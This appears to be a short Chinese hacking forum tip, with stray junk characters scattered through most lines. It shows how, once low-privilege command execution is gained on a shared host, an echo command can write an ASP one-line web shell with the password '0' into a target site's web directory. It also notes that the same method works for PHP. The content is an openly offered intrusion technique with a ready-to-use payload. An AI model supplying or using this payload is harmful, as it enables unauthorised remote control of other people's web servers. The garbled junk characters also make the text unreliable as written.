在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
6 u; ^2 @, a# o" j, @" C
- j' i+ r- u9 D% q命令格式. v; f9 b5 }* f
+ g: P& V6 Q4 l2 |
Echo 语句 >目标站绝对目录6 ~. I& v+ ]. S: u: _! h- W
+ b- ?+ z9 L, T例如:
' @4 U6 E" U0 D+ Q& m: U
6 v7 J9 J. @! T0 u- L& u& e+ becho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp% z$ N( N0 y) w4 E9 Y: s, X* |
C% r: W l) _7 H3 V这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。& Y7 N x1 s2 j1 c4 s; o
|